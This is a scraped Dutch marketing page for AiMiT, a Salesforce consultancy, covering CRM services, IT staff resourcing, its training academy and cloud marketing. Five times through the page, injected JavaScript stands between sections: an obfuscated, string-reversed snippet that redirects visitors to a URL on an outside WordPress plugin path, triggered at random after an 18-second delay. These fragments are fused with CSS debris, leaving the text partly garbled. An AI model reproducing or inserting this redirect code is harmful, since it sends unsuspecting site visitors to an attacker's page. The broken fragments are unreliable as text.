”OUR

) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}top:33px;”]

) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tom_1542466340201{margin-bottom: 0px !important;padding-bottom: 0px !important;}”]

Salesforce CRM Expertise

We zijn sinds 2001 gespecialiseerd in CRM software.

Voorbij zijn de dagen waarin klantenservice medewerkers meerdere schermen moeten bekijken om vragen te beantwoorden of een klant aan de lijn moeten houden om iets aan collega’s te vragen.

 

Find out more

Alle klantinformatie kan in één scherm worden aangeroepen. Aankoopgeschiedenis, klachten, bestelstatus en de geschiedenis van lead naar klant kunnen allemaal met één klik worden ingezien. Zelfs alle conversaties tussen u, de klant, en iedereen binnen uw bedrijf die met de klant gesproken heeft, kunnen in één oogopslag worden bekeken. Het systeem kan worden geautomatiseerd zodat follow-ups of escalaties naadloos plaatsvinden zonder handmatige interventie.

 

) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tom_1542466417702{margin-bottom: 0px !important;padding-bottom: 0px !important;}”]

Staff Resourcing

Het vinden van nieuwe IT staf is een steeds groter wordend probleem, gedeeltelijk doordat traditionele IT bureaus niet altijd bij blijven met de snel veranderende behoeftes in de omgeving van de klant en niet altijd een geschikte persoon kunnen vinden om een vacature te vullen. Wat Salesforce.com en SAP betreft kunnen wij helpen.

Find out more

We begrijpen wat er nodig is voor IT rollen in deze velden en hebben substantiële ervaring in het vinden van de juiste kandidaten zodat zij de best mogelijke match zijn voor de werkplaats van de klant. We hebben ook onze eigen studenten en alumni van de AiMiT Academy die we kunnen trainen en integreren in de IT ondersteuning voor uw systeem.

) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tom_1542466373619{margin-bottom: 0px !important;padding-bottom: 0px !important;}”]

Salesforce Academy

Salesforce.com is de rijzende ster in CRM, klantenservice en marketingcampagne systemen. Er is echter een tekort aan gekwalificeerde Administrators en Developers om het systeem te installeren en in-house te ondersteunen.

Find out more

AiMiT leidt continu nieuwe Administrators en Developers op om aan deze vraag te voldoen. We bieden off-site training aan in ons centrum en on-site training voor uw eigen staf. De AiMiT Academy kan ook nieuwe Administrators en Developers trainen en begeleiden in de werkplaats van de klant. Dit helpt om ze snel in de rol te laten groeien en geeft de klant onmiddellijke in-house Salesforce ondersteuning. We begeleiden hen en/of uw huidige staf in het behalen van de Salesforce.com Admin en Developer certificaten.

) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tom_1542466447273{margin-bottom: 0px !important;padding-bottom: 0px !important;}”]

Marketing In The Cloud

Stelt u zich voor dat u uw hele marketingcampagne – alle emails en sociale media activiteit – op één scherm kunt zien. We kunnen u laten zien hoe dit mogelijk is.

Find out more

In Salesforce.com zijn er simpele drag-and-drop gereedschappen die het mogelijk maken om een marketingcampagne op een eenvoudige manier te plannen en uit te voeren. U kunt sociale media, emails, sms’jes en Facebook berichten mengen in één campagne, via een simpele gebruikersinterface.

Via intelligente rapporten kunnen we u laten zien hoe u de performance van uw campagnes kunt monitoren en de meest effectieve campagnes prioriteit kunt geven.

Uw data wordt meteen volledig versleuteld en opgeslagen op een veilige plaats.